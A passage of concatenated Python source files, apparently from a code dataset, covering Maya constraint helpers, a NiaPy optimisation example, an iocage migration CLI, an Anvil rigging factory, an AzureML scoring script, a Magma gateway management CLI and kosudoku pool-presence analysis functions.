return scaleMatrix * rotateMatrix * translateMatrix
def setRestMatrix(self, restMatrix):
"""
Updates the rest matrix for this constraint by changing the rest components.
:type restMatrix: om.MMatrix
:rtype: None
"""
# Decompose rest matrix
#
translate, rotate, scale = transformutils.decomposeTransformMatrix(restMatrix, rotateOrder=self.rotateOrder())
# Check if constraint has rest translate
#
if self.hasAttr('restTranslate'):
self.setRestTranslate(translate)
# Check if constraint has rest rotate
#
if self.hasAttr('restRotate'):
self.setRestRotate(rotate)
# Check if constraint has rest scale
#
if self.hasAttr('restScale'):
self.setRestScale(scale)
def restInverseMatrix(self):
"""
Retrieves the inverse rest matrix.
:rtype: om.MMatrix
"""
return self.restMatrix().inverse()
def worldRestMatrix(self):
"""
Computes the world rest matrix for this constraint.
:rtype: om.MMatrix
"""
return self.restMatrix() * self.exclusiveMatrix()
def worldRestInverseMatrix(self):
"""
Retrieves the inverse world rest matrix for this constraint.
:rtype: om.MMatrix
"""
return self.worldRestMatrix().inverse()
class ConstraintTarget(object):
"""
Base class used to interface with constraint targets.
"""
__slots__ = ('_constraint', '_index')
def __init__(self, constraint, **kwargs):
"""
Private method called after a new instance has been created.
:type constraint: ConstraintMixin
:rtype: None
"""
# Call parent method
#
super(ConstraintTarget, self).__init__()
# Declare class variables
#
self._constraint = constraint.weakReference()
self._index = kwargs.get('index', 0)
@property
def constraint(self):
"""
Getter method used to retrieve the associated constraint for this target.
:rtype: ConstraintMixin
"""
return self._constraint()
@property
def index(self):
"""
Getter method used to retrieve the index for this constraint target.
:rtype: int
"""
return self._index
def targetPlug(self):
"""
Returns the element associated with this constraint target.
:rtype: om.MPlug
"""
return self.constraint.findPlug('target[{index}]'.format(index=self.index))
def targetChildPlug(self, name):
"""
Search method used to locate the child plug derived from this constraint target.
:type name: str
:rtype: om.MPlug
"""
return self.targetPlug().child(self.constraint.attribute(name))
def name(self):
"""
Returns the alias name for this constraint target.
:rtype: str
"""
return self.targetChildPlug('targetWeight').source().partialName(useLongNames=True)
def setName(self, name):
"""
Method used to change the alias name on the indexed weight attribute.
:type name: str
:rtype: bool
"""
# Get source connection from target weight plug
#
plug = self.targetChildPlug('targetWeight')
otherPlug = plug.source()
if otherPlug.isNull:
return
# Rename user attribute
#
fullPathName = self.constraint.fullPathName()
fnAttribute = om.MFnAttribute(otherPlug.attribute())
mc.renameAttr('%s.%s' % (fullPathName, fnAttribute.shortName), name)
mc.renameAttr('%s.%s' % (fullPathName, fnAttribute.name), name)
def weight(self):
"""
Returns the weight for this constraint target.
:rtype: float
"""
return self.targetChildPlug('targetWeight').asFloat()
def targetObject(self):
"""
Retrieves the target object driving this constraint channel.
If no source connection is found then none will be returned!
:rtype: mpynode.MPyNode
"""
plug = self.targetChildPlug('targetParentMatrix')
source = plug.source()
if not source.isNull:
return self.constraint.pyFactory(source.node())
else:
return None
def targetRotateOrder(self):
"""
Retrieves the rotate order for this constraint target.
:rtype: int
"""
return self.targetChildPlug('targetRotateOrder').asInt()
def targetOffsetTranslate(self):
"""
Retrieves the offset translation for this constraint target.
This method is only supported by parent constraints!
:rtype: om.MVector
"""
return om.MVector(
self.targetChildPlug('targetOffsetTranslateX').asFloat(),
self.targetChildPlug('targetOffsetTranslateY').asFloat(),
self.targetChildPlug('targetOffsetTranslateZ').asFloat()
)
def setTargetOffsetTranslate(self, translation):
"""
Updates the offset translation for this constraint target.
:type translation: om.MVector
:rtype: None
"""
self.targetChildPlug('targetOffsetTranslateX').setFloat(translation.x)
self.targetChildPlug('targetOffsetTranslateY').setFloat(translation.y)
self.targetChildPlug('targetOffsetTranslateZ').setFloat(translation.z)
def targetOffsetRotate(self):
"""
Retrieves the offset rotation for this constraint target.
This method is only supported by parent constraints!
:rtype: om.MEulerRotation
"""
return om.MEulerRotation(
self.targetChildPlug('targetOffsetRotateX').asFloat(),
self.targetChildPlug('targetOffsetRotateY').asFloat(),
self.targetChildPlug('targetOffsetRotateZ').asFloat(),
order=self.targetRotateOrder()
)
def setTargetOffsetRotate(self, rotation):
"""
Updates the offset rotation for this constraint target.
:type rotation: om.MEulerRotation
:rtype: None
"""
# Check if rotation needs reordering
#
rotateOrder = self.targetRotateOrder()
if rotation.order != rotateOrder:
rotation = rotation.reorder(rotateOrder)
# Assign rotation to plugs
#
self.targetChildPlug('targetOffsetRotateX').setFloat(rotation.x)
self.targetChildPlug('targetOffsetRotateY').setFloat(rotation.y)
self.targetChildPlug('targetOffsetRotateZ').setFloat(rotation.z)
def resetOffsetTransform(self):
pass
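# Usage sketch (hedged): `constraint`, `driven` and `driver` stand for MPyNode
# encapsulations obtained elsewhere; only methods defined in this module are used.
#
#   constraint.setConstraintObject(driven, skipScaleX=True, skipScaleY=True, skipScaleZ=True)
#   index = constraint.addTarget(driver)      # connects target plugs and a new weight attribute
#   target = constraint.targets()[index]
#   print(target.name(), target.weight())     # weight alias and current weight value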
|
python
|
# encoding=utf8
# This is temporary fix to import module from parent folder
# It will be removed when package is published on PyPI
import sys
sys.path.append('../')
# End of fix
import numpy as np
from NiaPy.task import StoppingTask, OptimizationType
from NiaPy.algorithms import BasicStatistics
from NiaPy.algorithms.basic import DifferentialEvolution
from NiaPy.benchmarks import Sphere
NUM_RUNS = 10 # define number of runs
stats = np.zeros(NUM_RUNS)
for i in range(NUM_RUNS):
task = StoppingTask(D=10, nFES=10000, optType=OptimizationType.MINIMIZATION, benchmark=Sphere())
print ("Working on run: " + str(i+1))
algo = DifferentialEvolution(NP=40, CR=0.9, F=0.5)
best = algo.run(task)
stats[i] = best[1] # save best
stat = BasicStatistics(stats)
print(stat.generate_standard_report()) # generate report
|
python
|
# Copyright (c) 2014-2017, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Migrate jails to the latest format (python-iocage)."""
import typing
import click
import libioc.events
import libioc.errors
import libioc.helpers
import libioc.Jails
import libioc.Logger
from .shared.click import IocClickContext
__rootcmd__ = True
class JailMigrationEvent(libioc.events.IocEvent):
"""CLI event that occurs when a jail is migrated from legacy format."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator'
) -> None:
self.identifier = jail.full_name
libioc.events.IocEvent.__init__(self)
@click.command(name="migrate", help="Migrate jails to the latest format.")
@click.pass_context
@click.argument("jails", nargs=-1)
def cli(
ctx: IocClickContext,
jails: typing.Tuple[str, ...]
) -> None:
"""Start one or many jails."""
logger = ctx.parent.logger
zfs = libioc.ZFS.get_zfs(logger=logger)
host = libioc.Host.HostGenerator(logger=logger, zfs=zfs)
filters = jails + ("template=no,-",)
ioc_jails = libioc.Jails.JailsGenerator(
filters,
logger=logger,
host=host,
zfs=zfs
)
if len(ioc_jails) == 0:
logger.error(f"No jails started your input: {jails}")
exit(1)
ctx.parent.print_events(_migrate_jails(
ioc_jails,
logger=logger,
zfs=zfs,
host=host
))
def _migrate_jails(
jails: 'libioc.Jails.JailsGenerator',
logger: 'libioc.Logger.Logger',
host: 'libioc.Host.HostGenerator',
zfs: 'libioc.ZFS.ZFS'
) -> typing.Generator['libioc.events.IocEvent', None, None]:
for jail in jails:
event = JailMigrationEvent(jail=jail)
yield event.begin()
if jail.config.legacy is False:
yield event.skip()
continue
if jail.running is True:
yield event.fail(libioc.errors.JailAlreadyRunning(
jail=jail,
logger=logger
))
continue
if libioc.helpers.validate_name(jail.config["tag"]):
name = jail.config["tag"]
temporary_name = name
else:
name = jail.humanreadable_name
temporary_name = "import-" + str(hash(name) % (1 << 32))
try:
new_jail = libioc.Jail.JailGenerator(
dict(name=temporary_name),
root_datasets_name=jail.root_datasets_name,
new=True,
logger=logger,
zfs=zfs,
host=host
)
if new_jail.exists is True:
raise libioc.errors.JailAlreadyExists(
jail=new_jail,
logger=logger
)
def _destroy_unclean_migration() -> typing.Generator[
'libioc.events.IocEvent',
None,
None
]:
_name = new_jail.humanreadable_name
logger.verbose(
f"Destroying unfinished migration target jail {_name}"
)
yield from new_jail.destroy(
force=True,
event_scope=event.scope
)
event.add_rollback_step(_destroy_unclean_migration)
yield from new_jail.clone_from_jail(jail, event_scope=event.scope)
new_jail.save()
new_jail.promote()
yield from jail.destroy(
force=True,
force_stop=True,
event_scope=event.scope
)
except libioc.errors.IocException as e:
yield event.fail(e)
continue
if name != temporary_name:
# the jail takes the old jails name
yield from new_jail.rename(name, event_scope=event.scope)
yield event.end()
|
python
|
"""Anvil is a tool for automating the rigging process in a given DCC."""
from six import itervalues
import config
import utils
import colors
import meta_data
import log
import version
import interfaces
import runtime
import objects
import grouping
import node_types
import sub_rig_templates
import rig_templates
class AnvilLog(log.LogMixin):
LOG = log.obtain_logger(__name__)
LOG = AnvilLog
LOG.info('Auto-Loaded DCC %s', runtime.dcc)
LOG.info('Loaded logger config file %s successfully, writing to: %s',
log.LogInitializer.CFG_FILE, log.LogInitializer.LOG_DIR)
LOG.info('Anvil environment has been set to %s', config.ENV)
LOG.info('Successfully initiated Anvil %s.', version.__version__)
EXISTING_ENCAPSULATIONS = {}
def check_for_encapsulation(dag_path):
"""Helper for the factory method to check for a previously existing encapsulation."""
for node_encapsulation in itervalues(EXISTING_ENCAPSULATIONS):
if dag_path == node_encapsulation._dcc_id:
return node_encapsulation
return None
def factory(dag_path, **kwargs):
"""Factory method that checks for previous encapsulations to reduce memory footprint and encourages reuse."""
if dag_path is None:
raise IOError('Tried to factory encapsulate None.')
if is_anvil(dag_path):
return dag_path
existing = check_for_encapsulation(runtime.dcc.scene.get_persistent_id(str(dag_path)))
if existing is not None:
return existing
node_type = runtime.dcc.scene.get_type(dag_path)
if node_type in config.DCC_TYPES[config.TRANSFORM_TYPE]:
encapsulation_class = objects.Transform
elif node_type in config.DCC_TYPES[config.CURVE_TYPE]:
encapsulation_class = objects.Curve
elif node_type in config.DCC_TYPES[config.JOINT_TYPE]:
encapsulation_class = objects.Joint
else:
encapsulation_class = objects.Transform
encapsulation = encapsulation_class(dag_path, **kwargs)
register_encapsulation(encapsulation)
return encapsulation
def factory_list(dag_nodes):
"""Factory method that iterates over a list and returns a list."""
return [factory(node) for node in dag_nodes]
def register_encapsulation(anvil_class_instance):
"""Helper to register a given encapsulation with the encapsulation registry."""
EXISTING_ENCAPSULATIONS[len(EXISTING_ENCAPSULATIONS)] = anvil_class_instance
def is_achunk(node):
return issubclass(type(node), node_types.BaseCollection)
def is_agrouping(node):
return issubclass(type(node), node_types.AbstractGrouping)
def is_aobject(node):
return issubclass(type(node), node_types.UnicodeDelegate)
def is_aiter(node):
return is_agrouping(node) or is_achunk(node)
def is_anvil(node):
return is_aiter(node) or is_aobject(node)
__all__ = ['config',
'meta_data',
'interfaces',
'log',
'version',
'node_types',
'runtime',
'objects',
'grouping',
'sub_rig_templates',
'rig_templates',
'utils',
'colors']
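# Usage sketch (hedged): 'some|dag|path' is a placeholder for a DCC node path.
#
#   node = factory('some|dag|path')            # Transform/Curve/Joint encapsulation by node type
#   nodes = factory_list(['path_a', 'path_b'])
#   # A second factory('some|dag|path') call is intended to return the same wrapper,
#   # found through EXISTING_ENCAPSULATIONS via check_for_encapsulation().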
|
python
|
import numpy as np
import pandas as pd
import os
from transformers import AutoModel
from inference_schema.schema_decorators import input_schema, output_schema
from inference_schema.parameter_types.pandas_parameter_type import PandasParameterType
from inference_schema.parameter_types.numpy_parameter_type import NumpyParameterType
def init():
global model
model_path = os.getenv("AZUREML_MODEL_DIR")
model = AutoModel.from_pretrained(model_path, from_tf=True)
input_sample = pd.DataFrame(data=[{'query': "AzureML is quite good."}])
output_sample = np.array([np.array(["POSITIVE", 0.95])])
@input_schema('data', PandasParameterType(input_sample))
@output_schema(NumpyParameterType(output_sample))
def run(data):
try:
text = data['query']
sentiment = model(text)
result = {}
result['sentiment'] = sentiment
return result
except Exception as e:
error = str(e)
return error
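# Local smoke-test sketch (an assumption: AZUREML_MODEL_DIR points at a model directory
# loadable by AutoModel.from_pretrained with from_tf=True).
#
#   init()
#   print(run(pd.DataFrame([{'query': 'AzureML is quite good.'}])))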
|
python
|
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from google.protobuf import json_format
from google.protobuf.struct_pb2 import Struct
from magma.common.rpc_utils import grpc_wrapper
from orc8r.protos import common_pb2, magmad_pb2, magmad_pb2_grpc
@grpc_wrapper
def start_services(client, args):
client.StartServices(common_pb2.Void())
@grpc_wrapper
def stop_services(client, args):
client.StopServices(common_pb2.Void())
@grpc_wrapper
def reboot(client, args):
client.Reboot(common_pb2.Void())
@grpc_wrapper
def restart_services(client, args):
client.RestartServices(
magmad_pb2.RestartServicesRequest(services=args.services)
)
@grpc_wrapper
def ping(client, args):
response = client.RunNetworkTests(
magmad_pb2.NetworkTestRequest(
pings=[
magmad_pb2.PingParams(
host_or_ip=host,
num_packets=args.packets,
) for host in args.hosts
]
)
)
print(response)
@grpc_wrapper
def traceroute(client, args):
response = client.RunNetworkTests(
magmad_pb2.NetworkTestRequest(
traceroutes=[
magmad_pb2.TracerouteParams(
host_or_ip=host,
max_hops=args.max_hops,
bytes_per_packet=args.bytes,
) for host in args.hosts
]
)
)
print(response)
@grpc_wrapper
def get_gateway_id(client, args):
response = client.GetGatewayId(common_pb2.Void())
print(response)
@grpc_wrapper
def generic_command(client, args):
params = json_format.Parse(args.params, Struct())
response = client.GenericCommand(
magmad_pb2.GenericCommandParams(command=args.command, params=params)
)
print(response)
@grpc_wrapper
def tail_logs(client, args):
stream = client.TailLogs(magmad_pb2.TailLogsRequest(service=args.service))
for log_line in stream:
print(log_line.line, end='')
def create_parser():
"""
Creates the argparse parser with all the arguments.
"""
parser = argparse.ArgumentParser(
description='Management CLI for Magmad',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Add subcommands
subparsers = parser.add_subparsers(title='subcommands', dest='cmd')
parser_start = subparsers.add_parser('start_services',
help='Start all magma services')
parser_stop = subparsers.add_parser('stop_services',
help='Stop all magma services')
parser_reboot = subparsers.add_parser('reboot',
help='Reboot the gateway device')
parser_restart = subparsers.add_parser('restart_services',
help='Restart specified magma services')
parser_ping = subparsers.add_parser(
'ping',
help='Ping a host from the gateway')
parser_traceroute = subparsers.add_parser(
'traceroute',
help='traceroute a host from the gateway')
parser_get_id = subparsers.add_parser('get_gateway_id',
help='Get gateway hardware ID')
parser_generic_command = subparsers.add_parser('generic_command',
help='Execute generic command')
parser_tail_logs = subparsers.add_parser('tail_logs',
help='Tail logs')
parser_ping.add_argument('hosts', nargs='+', type=str,
help='Hosts (URLs or IPs) to ping')
parser_ping.add_argument('--packets', type=int, default=4,
help='Number of packets to send with each ping')
parser_traceroute.add_argument('hosts', nargs='+', type=str,
help='Hosts (URLs or IPs) to traceroute')
parser_traceroute.add_argument('--max-hops', type=int, default=30,
help='Max TTL for packets, defaults to 30')
parser_traceroute.add_argument('--bytes', type=int, default=60,
help='Bytes per packet, defaults to 60')
parser_restart.add_argument('services', nargs='*', type=str,
help='Services to restart')
parser_generic_command.add_argument('command', type=str,
help='Command name')
parser_generic_command.add_argument('params', type=str,
help='Params (string)')
parser_tail_logs.add_argument('service', type=str, nargs='?',
help='Service')
# Add function callbacks
parser_start.set_defaults(func=start_services)
parser_stop.set_defaults(func=stop_services)
parser_reboot.set_defaults(func=reboot)
parser_restart.set_defaults(func=restart_services)
parser_ping.set_defaults(func=ping)
parser_traceroute.set_defaults(func=traceroute)
parser_get_id.set_defaults(func=get_gateway_id)
parser_generic_command.set_defaults(func=generic_command)
parser_tail_logs.set_defaults(func=tail_logs)
return parser
def main():
parser = create_parser()
# Parse the args
args = parser.parse_args()
if not args.cmd:
parser.print_usage()
exit(1)
# Execute the subcommand function
args.func(args, magmad_pb2_grpc.MagmadStub, 'magmad')
if __name__ == "__main__":
main()
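# Example invocations (the script name `magmad_cli.py` is an assumption; use whatever
# entry point this module is installed under):
#   magmad_cli.py ping 8.8.8.8 --packets 2
#   magmad_cli.py tail_logs magmad
#   magmad_cli.py get_gateway_id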
|
python
|
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
# Functions for handling pool presence table analysis
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
from kosudoku.utils import gSeparatorString, UpdateLogFileData
from kosudoku.output import generateOutputMatrixWithHeaders, writeOutputMatrix
from kosudoku.grid import SudokuGenomicCoord, CalculateSudokuGridOccupancyTaxonomy, \
PrintSudokuGridOccupancyTaxonomy
# ------------------------------------------------------------------------------------------------ #
def GenerateDTypeArrayForPoolPresenceTableImport(poolColumns):
import pdb
from numpy import int32
dtypeArray = []
i = 0
while i < len(poolColumns):
dtypeArray.append((poolColumns[i], int32))
i += 1
return dtypeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateDTypeArrayForPoolPresenceDict(indexLookupTable):
import pdb
from numpy import int32
poolNames = indexLookupTable.values()
poolNames = sorted(poolNames)
dtypeArray = []
dtypeArray.append(('readAlignmentCoord', int32))
# Add in columns for pools
i = 0
while i < len(poolNames):
dtypeArray.append((poolNames[i], int32))
i += 1
return dtypeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GeneratePoolPresenceTable(uniqueCoords, sortedValidGenomeArray, indexLookupTable, dtypeDict):
import numpy
import pdb
try:
poolPresenceTable = numpy.zeros(len(uniqueCoords), dtype=dtypeDict)
except:
pdb.set_trace()
i = 0
while i < len(uniqueCoords):
poolPresenceTable[i] = uniqueCoords[i]
i += 1
i = 0
j = 0
while j < len(uniqueCoords):
while(i < len(sortedValidGenomeArray) and \
sortedValidGenomeArray[i]['readAlignmentCoord'] == poolPresenceTable[j]['readAlignmentCoord']):
index = str(sortedValidGenomeArray[i]['index'])
column = indexLookupTable[index]
poolPresenceTable[j][column] += 1
i += 1
j += 1
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportPoolPresenceTable(poolPresenceTableFileName, poolColumns):
import numpy
import gc
from pdb import set_trace
import csv
fHandle = open(poolPresenceTableFileName, 'r')
poolColumnToHeaderIndexDict = {}
i = 0
datareader = csv.reader(fHandle)
for row in datareader:
if i == 0:
headers = row
poolColumnToHeaderIndexDict = {}
for col in poolColumns:
poolColumnToHeaderIndexDict[col] = headers.index(col)
i += 1
fHandle.close()
dtypeArray = GenerateDTypeArrayForPoolPresenceTableImport(poolColumns)
poolPresenceTable = numpy.zeros(i-1, dtype=dtypeArray)
i = 0
colKeys = list(poolColumnToHeaderIndexDict.keys())
colIndices = []
while i < len(colKeys):
colIndices.append(poolColumnToHeaderIndexDict[colKeys[i]])
i += 1
fHandle = open(poolPresenceTableFileName, 'r')
i = 0
datareader = csv.reader(fHandle)
for row in datareader:
if i > 0:
j = 0
while j < len(colKeys):
poolPresenceTable[i-1][colKeys[j]] = row[colIndices[j]]
j += 1
i += 1
fHandle.close()
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def WritePoolPresenceTable3(filename, poolPresenceTable, poolColumns):
fhandle = open(filename, 'w')
# Write out the header line
headerLine = ''
i = 0
while i < len(poolColumns):
headerLine += poolColumns[i]
if i < len(poolColumns) - 1:
headerLine += ','
i += 1
headerLine += '\n'
totalStr = ''
i = 0
while i < poolPresenceTable.shape[0]:
outputStr = ''
j = 0
while j < len(poolColumns):
outputStr += str(poolPresenceTable[i][poolColumns[j]])
if j < len(poolColumns) - 1:
outputStr += ','
j += 1
outputStr += '\n'
totalStr += outputStr
i += 1
writeStr = headerLine + totalStr
fhandle.write(writeStr)
fhandle.close()
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateBlankPhysicalAddressDict(poolPresenceTable):
uniqueCoords = poolPresenceTable['readAlignmentCoord']
physicalAddressDict = {}
i = 0
while i < len(uniqueCoords):
physicalAddressDict[int(uniqueCoords[i])] = []
i += 1
return physicalAddressDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def FindAddressCoords(poolPresenceTableLine, axisPools, threshold=5):
axisAddresses = []
i = 0
while i < len(axisPools):
if poolPresenceTableLine[axisPools[i]] >= threshold:
axisAddresses.append([axisPools[i], poolPresenceTableLine[axisPools[i]]])
i += 1
return axisAddresses
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def FindAddressCoords2(poolPresenceTableLine, axisPools, threshold=5):
# Very much the same as FindAddressCoords, but returns a list of just axis addresses and a
# dict of the read counts for each of these axis addresses, rather than combining this dict
# into the axisAddresses array
axisAddresses = []
axisAddressScoreDict = {}
i = 0
while i < len(axisPools):
if poolPresenceTableLine[axisPools[i]] >= threshold:
axisAddresses.append(axisPools[i])
axisAddressScoreDict[axisPools[i]] = poolPresenceTableLine[axisPools[i]]
i += 1
return [axisAddresses, axisAddressScoreDict]
# ------------------------------------------------------------------------------------------------ #
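# ------------------------------------------------------------------------------------------------ #
# Illustrative sketch (not part of the original module) contrasting the two return formats above.
# The pool presence table line is faked here with a plain dict; real lines are numpy structured
# rows, but both support the same key-style access used by these functions.
def _exampleFindAddressCoordsFormats():
    fakeLine = {'row_A': 12, 'row_B': 0, 'row_C': 7}
    rowPools = ['row_A', 'row_B', 'row_C']
    pairs = FindAddressCoords(fakeLine, rowPools, threshold=5)
    # pairs == [['row_A', 12], ['row_C', 7]]  (pool name and read count combined)
    names, scores = FindAddressCoords2(fakeLine, rowPools, threshold=5)
    # names == ['row_A', 'row_C'] and scores == {'row_A': 12, 'row_C': 7}
    return pairs, names, scores
# ------------------------------------------------------------------------------------------------ #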
# ------------------------------------------------------------------------------------------------ #
def CalculatePoolCoordsForLine(poolPresenceTableLine, rowPools, colPools, prPools, \
pcPools, controlPools, threshold=5):
# Like CalculatePhysicalAddressCoordsForLine, but also reports the contents of the control pools.
# Used in generation of the pool presence table taxonomy.
addresses_r = FindAddressCoords2(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords2(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords2(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords2(poolPresenceTableLine, pcPools, threshold=threshold)
if controlPools != None:
addresses_control = FindAddressCoords2(poolPresenceTableLine, controlPools, \
threshold=threshold)
else:
addresses_control = None
# Each addresses_* entry is in the FindAddressCoords2 format: a list of pool names above
# threshold and a dict mapping each of those pool names to its read count.
return [addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, \
addresses_pr, addresses_pc, addresses_control):
nRowPoolAxisEntries = len(addresses_r[0])
nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
nAddressPoolAxesWithMoreThanOneEntry = 0
if nRowPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nColPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nPRPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nPCPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
return nAddressPoolAxesWithMoreThanOneEntry
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, addresses_pc, \
addresses_control):
# Used in generation of pool presence table taxonomy
# Used to calculate how many lines can be used to calculate library addresses
nRowPoolAxisEntries = len(addresses_r[0])
nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
nAddressPoolAxesWithEntries = 0
if nRowPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nColPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nPRPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nPCPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if addresses_control != None:
nControlPoolsWithEntries = len(addresses_control[0])
else:
nControlPoolsWithEntries = 0
return [nAddressPoolAxesWithEntries, nControlPoolsWithEntries]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, addresses_pc):
# Calculate the possible library addresses that a read alignment coord maps to
# The score is the total number of reads that are associated with the library address assignment
possibleAddresses = []
for address_r in addresses_r:
for address_c in addresses_c:
for address_pr in addresses_pr:
for address_pc in addresses_pc:
row = address_r[0]
row_score = address_r[1]
col = address_c[0]
col_score = address_c[1]
pr = address_pr[0]
pr_score = address_pr[1]
pc = address_pc[0]
pc_score = address_pc[1]
possibleAddress = row + '_' + col + '_' + pr + '_' + pc
possibleAddressScore = row_score + col_score + pr_score + pc_score
possibleAddresses.append([possibleAddress, possibleAddressScore])
return possibleAddresses
# ------------------------------------------------------------------------------------------------ #
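# ------------------------------------------------------------------------------------------------ #
# Illustrative sketch (not part of the original module): how address coords from each axis combine
# into candidate library addresses. With one entry per axis the result is a single address; two
# entries on one axis simply double the number of candidates. Pool names are invented.
def _exampleCalculatePossibleAddresses():
    addresses_r = [['row_A', 10]]
    addresses_c = [['col_01', 8], ['col_02', 6]]
    addresses_pr = [['pr_plate1', 9]]
    addresses_pc = [['pc_plate1', 7]]
    possibleAddresses = CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, addresses_pc)
    # Expected: [['row_A_col_01_pr_plate1_pc_plate1', 34], ['row_A_col_02_pr_plate1_pc_plate1', 32]]
    return possibleAddresses
# ------------------------------------------------------------------------------------------------ #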
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressesForPoolPresenceTableLine(poolPresenceTableLine, rowPools, colPools, \
prPools, pcPools, threshold=5):
# Used in generation of pool presence table taxonomy
# Used to calculate possible addresses for pool presence table line
coord = int(poolPresenceTableLine['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTableLine, pcPools, threshold=threshold)
possibleAddresses = CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, \
addresses_pc)
return possibleAddresses
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressesForPoolPresenceTableLine2(poolPresenceTableLine, rowPools, colPools, \
prPools, pcPools, logReadNumberRatioHistogramFitDict, logReadNumberRatioHistogramIntegralDict, \
threshold):
# Used in generation of pool presence table taxonomy
# Used to calculate possible addresses for pool presence table line
coord = int(poolPresenceTableLine['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTableLine, pcPools, threshold=threshold)
possibleAddressesAndScores = \
CalculatePossibleAddresses2(addresses_r, addresses_c, addresses_pr, addresses_pc, \
logReadNumberRatioHistogramFitDict, logReadNumberRatioHistogramIntegralDict)
return possibleAddressesAndScores
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfEntriesInPoolAxes(addresses_r, addresses_c, \
addresses_pr, addresses_pc):
import pdb
nRowCoords = len(addresses_r[0])
nColCoords = len(addresses_c[0])
nPRCoords = len(addresses_pr[0])
nPCCoords = len(addresses_pc[0])
# pdb.set_trace()
return [nRowCoords, nColCoords, nPRCoords, nPCCoords]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateMaxNumberOfEntriesInSinglePoolAxis(addresses_r, addresses_c, \
addresses_pr, addresses_pc):
# This function finds the pool axis with the most coordinate entries and reports this number
# This number is important for guessing how many library addresses an ambiguous line might map to
# It is the minimum number of addresses that the line could map to.
nRowPoolAxisEntries = len(addresses_r[0])
